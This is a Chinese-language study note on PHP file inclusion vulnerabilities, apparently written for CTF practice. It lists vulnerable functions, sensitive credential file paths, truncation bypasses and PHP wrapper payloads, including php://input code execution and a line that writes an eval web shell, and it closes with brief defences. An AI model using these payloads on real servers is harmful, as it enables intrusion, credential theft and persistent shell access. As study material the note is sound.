文件包含漏洞总结

-

文件包含原理基础：

在网页设置中运用了包含的函数，php中居多

php中造成文件包含漏洞的函数：
1、include() 当使用该函数包含文件时，只有代码执行到 include() 函数时才将文件包含进来，发生错误时只给出一个警告，继续向下执行。
2、include_once() 功能和 include() 相同，区别在于当重复调用同一文件时，程序只调用一次。
3、require() 只要程序一执行就会立即调用文件,发生错误的时候会输出错误信息,并且终止脚本的运行
4、require_once() 它的功能与 require() 相同，区别在于当重复调用同一文件时，程序只调用一次。
hight_file,show_source,readfile,file_get_contents,fopen,file

jsp/Servlet中：
ava.io.file() , java.io.filereader() ....

asp中：
include file , include virtual ....

1. 本地文件包含（服务器本身）
   常见敏感信息路径：

   Windows系统
       c:\boot.ini // 查看系统版本
       c:\windows\system32\inetsrv\MetaBase.xml // IIS配置文件
       c:\windows\repair\sam // 存储Windows系统初次安装的密码
       c:\ProgramFiles\mysql\my.ini // MySQL配置
       c:\ProgramFiles\mysql\data\mysql\user.MYD // MySQL root密码
       c:\windows\php.ini // php 配置信息
   
   Linux/Unix系统
       /etc/passwd // 账户信息
       /etc/shadow // 账户密码文件
       /usr/local/app/apache2/conf/httpd.conf // Apache2默认配置文件
       /usr/local/app/apache2/conf/extra/httpd-vhost.conf // 虚拟网站配置
       /usr/local/app/php5/lib/php.ini // PHP相关配置
       /etc/httpd/conf/httpd.conf // Apache配置文件
       /etc/my.conf // mysql 配置文件
   
   或者通过phpinfo获取位置

2. 远程文件包含
   php.ini 中 allow_url_include 和 allow_url_fopen 为On状态，可加载远程文件
   payload:

   http://www.ctfs-wiki.com/FI/FI.php?filename=http://192.168.91.133/FI/php.txt

本地文件包含漏洞的绕过

1. %00 截断
   条件： magic_quotes_gpc = off
   php版本 < 5.3.4
   原理：%00 被url解码后是空字符
   注意 在post中%00不会被url解码 只能通过burp修改hex值为00

2. 路径长度截断
   条件： windows OS，点号需要长于256；linux OS 长于4096
   原理： Windows下目录最大长度为256字节，超出的部分会被丢弃；

   Linux下目录最大长度为4096字节，超出的部分会被丢弃。
   

   payload:

   http://www.ctfs-wiki.com/FI/FI.php?filename=test.txt/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././

3. 点号截断
   条件： windows OS，点号需要长于256
   原理：后台通过 @PathVariable 获取
   payload:

   ?filename=test.php.txt
   测试结果

   远程文件包含漏洞绕过：

   绕过类型限制

   测试源码

   <?php include($_GET['filename'] . ".html"); ?>

4. 问号、#、空格绕过
   payload:

   ?filename=http://192.168.91.133/FI/php.txt?

伪协议：

php伪协议，事实上是其支持的协议与封装协议
支持的种类有这12种

• file:// — 访问本地文件系统

• php:// — 访问各个输入/输出流（I/O streams）

• data:// — 数据（RFC 2397）

• phar:// — PHP 归档

• ftp:// — 访问 FTP(s) URLs

• http:// — 访问 HTTP(s) 网址

• zlib:// — 压缩流

• glob:// — 查找匹配的文件路径模式

• ssh2:// — Secure Shell 2

• rar:// — RAR

• ogg:// — 音频流

• expect:// — 处理交互式的流

php伪协议：

原理

1. ?user=php://input 访问请求原始数据的只读流
   (post data:the user is admin)
   源码：

   if(isset($user)&&(file_get_contents($user,'r')==="the user is admin"))
   include(file)

2. php://output 只写的数据流
   允许以print和echo方式写入输出缓冲区

   <?php
       $out=fopen("php://stdout", 'w');  
       echo $out."\n";
       fwrite($out , "this is a test");
       fclose($out);
   ?>

   这个例子我没太懂的样子？

3. php://filter 任意文件读取
   同1：

   ?user=php://input&file=php://filter/read=string.rot13/resource=class.php
   
   php://filter/read=<读链需要应用的过滤器列表>

   过滤器：

4. 字符串过滤器：

   string.rot13|string.toupper（大写）|string.wolower|string.strip_tags（去除空字符、HTML 和 PHP 标记后的结果
   try

   <?php
       $fp = fopen('php://output', 'w');
       stream_filter_append($fp, 'string.rot13');
       echo "rot13:";
       fwrite($fp, "This is a test.\n");
       fclose($fp);
   
       $fp = fopen('php://output', 'w');
       echo "Del1:";
       stream_filter_append($fp, 'string.strip_tags', STREAM_FILTER_WRITE); //无特例 全过滤
       fwrite($fp, "<b>This is a test.</b>!!!!<h1>~~~~</h1>\n");
       fclose($fp);
   
       $fp = fopen('php://output', 'w');
       echo "Del2:";
       stream_filter_append($fp, 'string.strip_tags', STREAM_FILTER_WRITE, "<b>"); //留下<b>
       fwrite($fp, "<b>This is a test.</b>!!!!<h1>~~~~</h1>\n");
       fclose($fp);
   
       $fp = fopen('php://output', 'w');
       stream_filter_append($fp, 'string.strip_tags', STREAM_FILTER_WRITE, array('b','h1')); //留下数组中包含的两个
       echo "Del3:";
       fwrite($fp, "<b>This is a test.</b>!!!!<h1>~~~~</h1>\n");
       fclose($fp);
   
   ?>

5. 转换过滤器：

   convert.base64-encode|decode
   line-length 截块 line-break-chars 字符隔开
   try

   $param = array('line-length' => 8, 'line-break-chars' => "\n");
   $fp = fopen('php://output', 'w');
   stream_filter_append($fp, 'convert.base64-encode', STREAM_FILTER_WRITE, $param);
   echo "\nbase64-encode-split:\n";
   fwrite($fp, "This is a test.\n");
   fclose($fp);

6. 压缩过滤器：
   zlib.deflate|zlib.inflate

7. 加密过滤器

运用

需要开启allow_url_fopen的：php://input、php://stdin、php://memory和php://temp
不需要开启allow_wrl_fopen的：php://filter

1. php://filter
   php://filter用于读取源码，

   filter可以get提交
   ?a=php://filter/read=convert.base64-encode/resource=xxx.php

2. php://input
   php://input用于执行php代码
   enctype=”multipart/form-data”时 php://input 无效
   可绕过 file_get_contents()

   input需要post提交数据
   ?file=php://input 
   同时post数据如<?php phpinfo()?> 
   <?php system('whoami');?>
   <?PHP fputs(fopen('shell.php','w'),'<?php @eval($_POST[cmd])?>');?>

   file 伪协议

   访问本地文件系统且不受 allow_url_fopen和allow_url_include影响
   用法：

   file:// [文件的绝对路径和文件名]
   linux 系统环境下：
   ?file=file:///etc/passwd
   winows 系统环境下：
   ?file=file:///E:\phpStudy\WWW\code\phpinfo.php
   ?filename=file://c:/a.html

   data伪协议

3. data://伪协议

   ?file=data:text/plain;base64,PD9waHAgcGhwaW5mbygpPz4=  
   #后面的base64字符是需要传入的字符串的base64编码

4. 读取文件
   类似于php 的 input
   file_get_contents()
   条件： php<5.3.0> 可造成任意代码执行
   常用

   1.?file=data:text/plain,<?php phpinfo()?>  #GET数据

   phar伪协议

   将任意文件当作压缩包来解压
   条件：php>=5.3.0 后只能为zip

   ?file=phar://压缩包/内部文件 phar://xxx.png/shell.php
   可以将木马压缩为zip 然后改后缀

   zip伪协议

   条件：php>=5.3.0(win下<5.4)

   ?file=zip://[压缩文件绝对路径]#[压缩文件内的子文件名] zip://xxx.png#shell.php。
   注意 ## 编码为 %23

防御方法

1. 过滤 ../../ ,http:// ,http://
2. 在php.ini 中关掉 allow_url_fopen和allow_url_include
3. 白名单或者php中可使用open_basedir配置限制访问限制在指定的区域